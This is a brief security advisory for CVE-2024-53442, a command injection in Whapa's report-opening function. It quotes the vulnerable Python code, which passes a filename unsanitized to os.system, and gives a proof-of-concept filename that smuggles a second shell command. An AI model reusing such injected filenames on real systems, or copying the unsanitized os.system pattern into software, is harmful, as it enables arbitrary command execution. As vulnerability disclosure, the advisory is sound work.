skip to content W3C SVG

CVE-2024-53442 - Command Injection on Whapa

Command Injection - Opening HTML Report Functionality

Repository URL: https://github.com/B16f00t/whapa/tree/master Code URL: https://github.com/B16f00t/whapa/blob/master/whapa-gui.py#L787

def report(self):
        """Open the report"""

        self.path = filedialog.askopenfilename(title="Select file", filetypes=(("html files", "*.html"), ), initialdir = "report")
        if not self.path:
            return

        if system == "Linux":
            os.system('xdg-open "{}"'.format(self.path))
        else:
            os.startfile(self.path)

When opening HTML reports within Whapa, a specially crafted filename could be used to gain command injection on Linux systems due to how the filename is immediately passed to os.system(xdg-open <filename>) without sanitization.

Proof of Concept

A specially crafted filename can be created via the following command: touch 'report"; touch exploit.txt; ".html'. Then within Whapa, select Open Report & open up the file we just created. After erroring out, our exploit.txt file will then be created.